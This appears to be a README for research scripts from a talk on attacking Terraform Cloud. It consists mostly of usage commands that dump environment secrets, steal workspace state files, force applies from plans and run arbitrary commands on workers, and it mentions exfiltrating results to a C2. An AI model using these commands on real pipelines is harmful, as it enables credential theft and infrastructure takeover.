This repository contains scripts to demonstrate the vulnerabilities shown in our associated talk: Attacking and Defending Infrastructure with Terraform: How we got admin across cloud environments.
There are two scenarios where you can use these scripts:
- When you don't have access to TFC/TFE, or you don't have a token, but you can create a PR to a github repository linked to TFC/TFE and speculative plans are run automatically.
- When you can have access to a Terraform Cloud workspace and you have a valid token to do so.
For this scenario use the script: PR_attack.py.
Note: You still needs access to TFC in order to read the output of the attacks. But they could also execute arbitrary commands and exfiltrate the results to a C2 they control.
Access the secrets from the environment variables.
python3 PR_attack.py
--repo "git@github.com:CryptoExchangeCo/website.git"
--folder "dev"
--get_envsDemo
Get the state file for the current workspace.
python3 PR_attack.py
--repo "git@github.com:CryptoExchangeCo/website.git"
--folder "dev"
--get_state_fileGet the state file for a different workspace in the same organization.
python3 PR_attack.py
--repo "git@github.com:CryptoExchangeCo/website.git"
--folder "dev"
--get_state_file_from_workspace "website_prod"Demo
It performs an apply on plan using a tf file as an input.
python3 PR_attack.py
--repo "git@github.com:CryptoExchangeCo/website.git"
--folder "dev"
--apply_on_plan "templates/s3_bucket.tf"Demo
Execute an arbitrary command in the TF worker.
python3 PR_attack.py
--repo "git@github.com:CryptoExchangeCo/website.git"
--folder "dev"
--exec_command "id;env;hostname"For this scenario use the script: TF_attack.py.
The usage is very similar to the previous scenario. To retrieving secrets from environment variables you will run:
python3 TF_attack.py
--hostname "app.terraform.io"
--organization "CryptoExchangeCo"
--workspace "website_dev"
--get_envs